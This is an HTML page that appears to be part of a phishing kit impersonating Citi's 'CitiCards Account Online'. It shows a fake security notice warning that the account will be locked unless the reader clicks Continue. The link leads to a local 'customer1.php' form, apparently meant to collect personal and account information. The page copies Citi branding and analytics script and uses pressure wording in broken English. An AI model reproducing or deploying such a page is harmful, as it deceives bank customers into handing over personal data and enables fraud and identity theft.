<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html> 
<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<meta http-equiv="pragma" content="no-cache, no-store, must-revalidate, max-age=0, s-max-age=0, proxy-revalidate" />
<meta  http-equiv="expires" content="0" />
<meta http-equiv="cache-control" content="no-cache, no-store, must-revalidate, max-age=0, s-max-age=0, proxy-revalidate" />
		 <meta http-equiv="refresh" content="900;URL=OutsideTimeOut.html"/>
	
<script type="text/javascript" src="js/common.js"></script>
		<link rel="shortcut icon" href="img/snco/favicon.ico" type="image/x-icon" />

  <meta name="robots" content="index,follow" />

<script language='javascript'>
if(top!=self) top.location=self.location;
</script>



		<title> New Alert Important Notice </title>


<title>CitiCards Account Online</title>


	
		<style type="text/css">
			@import url(css/globalPG.css);
        </style>

	
	


<style type="text/css">
	@import url(css/bubble.css);
	@import url(css/account_activity.css);	
</style>



<link rel="stylesheet" media="print" type="text/css"
	href="css/print.css" />

<style type="text/css">
	@import url(css/tools.css);
	@import url(css/registration.css);
	@import url(css/popup.css);
</style>

			
		<style type="text/css">
	            @import url(css/gen.css);    
		</style>	
	
		
 

<script type="text/javascript" src="js/jquery.min.js"></script> 
<script type="text/javascript" src="js/util/detect.js"></script>

<script type="text/javascript" src="js/util/global.js"></script>
<script type="text/javascript" src="js/util/event.js"></script>
<script type="text/javascript" src="js/util/xhrsession.js"></script>
<script type="text/javascript" src="js/popup.js"></script>
<script type="text/javascript" src="js/bubble.js"></script>
<script type="text/javascript" src="js/registration.js"></script>
<script type="text/javascript" src="js/emailinline_editor.js"></script>
<script type="text/javascript">
	
	function setPhoneNo(AreaH,PrefixH,SuffixH,AreaW,PrefixW,SuffixW)
	{
		var mylist=document.getElementById("phoneType");
		
		if(mylist) {
					if(mylist.value == "") {
						document.getElementById("newAreaCode").value="";
						document.getElementById("newPrefix").value="";
						document.getElementById("newSuffix").value="";
					 }
					if(mylist.value == "home") {
						if(AreaH=="0")
							document.getElementById("newAreaCode").value="";
						else
							document.getElementById("newAreaCode").value=AreaH;
						if(PrefixH=="0")
							document.getElementById("newPrefix").value="";
						else
							document.getElementById("newPrefix").value=PrefixH;
						if(SuffixH=="0")
							document.getElementById("newSuffix").value="";
						else
							document.getElementById("newSuffix").value=SuffixH;
					} 
				 	if(mylist.value == "work") {
				 		if(AreaW=="0")
							document.getElementById("newAreaCode").value="";
						else
							document.getElementById("newAreaCode").value=AreaW;
						if(PrefixW=="0")
							document.getElementById("newPrefix").value="";
						else
							document.getElementById("newPrefix").value=PrefixW;
						if(SuffixW=="0")
							document.getElementById("newSuffix").value="";
						else
							document.getElementById("newSuffix").value=SuffixW;
					 }
			 }
	}
	</script>




 <?xml version="1.0" encoding="UTF-8"?><script src="js/mtagconfig.js" type="text/javascript"/>
<script>
function chatMonitor(scope,varname,varvalue)
{
javascript:lpAddVars(scope,varname,varvalue);
}

function chatImmediateSubmit(scope,varname,varvalue)
{
javascript:lpSendData(scope,varname,varvalue);
}

</script>

<script></script>
 
</head>
<body id="aPublic_t_s" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" xonLoad="doOnload();">


<input type="hidden" id="locale_lang" value="en" />

<input type="image" src="../../svc/content/images/spacer.gif" alt="" height="1" width="1" name="auto_" visible="false"/>

<div id="container">		


<SCRIPT language="Javascript">resizeIt(700,800);</SCRIPT>
<div id="main_container">
		<a name="maincontent" id="maincontent"></a>

 
     

<br><br>
<SCRIPT language="Javascript">resizeIt(800,450);</SCRIPT>
<table>
    <tr>

      <td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>

      		<td valign="top" align="left">
		   		<p><h1>NOTICE:</h1>
		   		<br><br>
   				<h1>Your security is very important to us.</h1><br>
   				Because of high numbers of identity theft attempts we need to apply additional 
   				security to your account in order to keep our Cardmember safe.<br><br>
				Every couples of month we will screen this alert to your account and we will
				ask you to update your Personal information.<br><br>

				This way we reduce the risk of identity theft and all your personal informations
				will be kept safe.<br><br>
				This is not an optional step, if you do not complete the next form we will be forced

   				to Lock your account.<br><br>Please press <b>Continue</b> and complete the form on the next page as soon as possible.<br>
			</td>

       
       
            
      <td>&nbsp;&nbsp;&nbsp;&nbsp;</td>
    </tr>

    <tr>
      <td align="right">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
        
      <td valign="top" align="right">
         <form method="post" action="#" name="speedbump">
         	
            <div class="hrLine"></div>
            
            </form>
            </td>
            </tr>
           
    
     <tr align="right">

      	<td >&nbsp;&nbsp;&nbsp;</td>
    	<td >
    		<table align="center" border="0">
    			<tr>&nbsp;</tr>
    			<tr>

    				<td width="100px;"></td>
				    <td>
					    
					    	<a href ="customer1.php?_nfpb=true&_nfls=false&_pageLabel=page_ecareprofile&p_returnUrl=page_customercenter" onClick="Javascript:self.close();';" class="arrow" >Continue&nbsp;&nbsp;&nbsp;</a>            
					    
			        </td>

			        
    				
    								    
    			</tr>
    		</table>
    	</td>
    </tr>
</table>
<br><br><br>
</div>

</div>


<script language="javascript">
wssenabled = true;
var _hbEC=0,_hbE=new Array;function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="vendorweb.citibank.com";
hbx.acct = "DM5603223IVW";
		hbx.pn="PUT+PAGE+NAME+HERE";			
		var myTitle= document.title;
		var stripTitle = ReplaceAll(myTitle,String.fromCharCode(174),'');
		//Added this like to remove the single quote from the screen title.
		stripTitle = ReplaceAll(stripTitle,String.fromCharCode(39),'');
		hbx.pn = stripTitle;
var GenError = "";			
	hbx.mlc="CONTENT+CATEGORY";
	hbx.pndef="title";
	hbx.ctdef="full";
	hbx.fv="";
	hbx.lt="auto";
	hbx.dlf="n";
	hbx.dft="n";
	hbx.elf="n";
	hbx.seg="";
	hbx.fnl="";
	hbx.cmp="";
	hbx.cmpn="";
	hbx.dcmp="";
	hbx.dcmpn="";
	hbx.dcmpe="";
	hbx.dcmpre="";
	hbx.hra="";
	hbx.hqsr="";
	hbx.hqsp="";
	hbx.hlt="";
	hbx.hla="";
	hbx.gp="";
	hbx.gpn="";
	hbx.hcn="";
	hbx.hcv="";
	hbx.cp="null";
	hbx.cpd="";
	hbx.ci=""; 
	var cv = new _hbEvent("cv");
	cv.c31="null";
	cv.c1="";
	cv.c2="";
	//set the values in Websidestory
		cv.c3="";
	cv.c4="";

		cv.c5="";
		var _cus10 = document.title + '|' +  'None';
		cv.c10 = _cus10.replace(String.fromCharCode(174),'');

            cv.c25 = 'none';

	hbx.hc1="";



	hbx.hc2="";



	hbx.hc3="";



	hbx.hc4="";



	hbx.hrf="";

	var _pec = "";



	_pec = GenError;



	if(document.body.innerHTML){



		var _text=document.body.innerHTML;



		var _arr=new Array();



		var _tl=_text.toLowerCase();



		var _msg2=">",_msg3="</fo"+"nt>";



		var _idx1=_tl.indexOf('<fo'+'nt class=errortext');



		if(_idx1==-1) _idx1=_tl.indexOf('<fo'+'nt class="errortext"');		



		



		if(_idx1!=-1) {



			var _idx2=_tl.indexOf(">",_idx1);



			var _idx3=_tl.indexOf(_msg3,_idx1);



			



			if( _tl.substring(_idx2+_msg2.length,_idx3).indexOf("<br><br>") != -1 ) {



				_arr=_tl.substring(_idx2+_msg2.length,_idx3).split("<br><br>");



				_pec=_arr[1];



			}



			else 



			_pec=_tl.substring(_idx2+_msg2.length,_idx3);



			_pec = _pec.replace(/[^a-zA-Z0-9\,\.\=\-\?]+/g,' ');



			hbx.pec= _pec;







		}



		else {



			_pec = GenError;



			_pec = _pec.replace(/[^a-zA-Z0-9\,\.\=\-\?]+/g,' ');



			//hbx.pec=GenError;



		}



	}
	</script>

<script language="javascript">



function _hbOnPrePVR(){if(typeof _lvid!="undefined")_lvid="";}

</script>

<script language="javascript1.1" src="js/util/hbx.js"></script>



<script src="js/tracking.js" type="text/javascript"></script>
 
</body>
	

<head>
		<meta http-equiv="pragma" content="no-cache, no-store, must-revalidate, max-age=0, s-max-age=0, proxy-revalidate" />

		<meta  http-equiv="expires" content="0" />
		<meta http-equiv="cache-control" content="no-cache, no-store, must-revalidate, max-age=0, s-max-age=0,proxy-revalidate" />
	</head>
	
<script type="text/javascript">
 	if(tokenValue!=null)
	{
		try{
				//updateTokenIDForAnchorTags();
				updateTokenIDInForms();
		  }
		  catch(err)
		  {
		  }
	}
</script>	
</html>





